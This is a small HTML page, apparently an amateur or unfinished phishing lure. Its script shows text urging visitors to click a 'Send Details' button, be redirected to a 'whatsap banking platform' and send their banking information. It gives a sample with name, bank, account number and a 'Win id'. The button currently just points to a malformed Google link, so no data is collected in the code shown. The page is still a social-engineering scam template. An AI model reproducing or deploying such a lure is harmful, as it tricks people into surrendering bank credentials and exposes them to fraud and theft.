
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8"/>
        <meta name="description" content=""/>
        <title> </title>
        <style>
            
                   div{
                
            background-color:black;
            height:600px;
            width:1000px;
            align-items:center;
            align-content:center;
            align-self:center;
            text-align:center;
            font-weight:bold;
            color:white;
            font-size:40px;
            border-top-right-radius:40px;
           border-top-left-radius:40px;
           border-bottom-right-radius:40px;
           border-bottom-left-radius:40px;
               }
               
               
        button{
            color:white;
            align-self:center;
            align-items:center;
            align-content:center;
            border-top-right-radius:40px;
            border-top-left-radius:40px;
            border-bottom-right-radius:40px;
            border-bottom-left-radius:40px;
            border-top-color:blue;
            border-bottom-color:white;
            width:400px;
            height:100px;
            background-color:purple;
            font-size:50px;
            font-weight:bold;
            }  
            
            a{
                
            color:white;
            font-size:40px;
            font-weight:bold;
            
            }     
            
            input{
                border-top-right-radius:40px;
                border-top-left-radius:40px;
                border-bottom-right-radius:40px;
                border-bottom-left-radius:40px;
                height:60px;
                color:black;
                width:200px;
            
            }
            
            placeholder{
                
            color:black;
            }
        
        
        </style>
    </head>
    <body>
        <div id = "window"></div>
           
        <script>
          const displayInterface = document.getElementById("window");
          displayInterface.innerHTML = "Click the button bellow and you will be redirected to our whatsap banking platform and send your banking information e.g " + `<br></br>` + "Name : John Smith." + `<br></br>` + "Bank : ARBA Bank " +`<br></br>` + " Account Number : 4644 XXXX XXXXX XXXX XXXX 568 " + ` <br></br>` + "Win id : XXXMPXXXX " + `<br></br>` + `<button onclick = "sendDetails()">Send Details</button>`;
          function sendDetails(){
              window.location.href = "www.google.com ";
          
          }
          
        </script>
    </body>
</html>
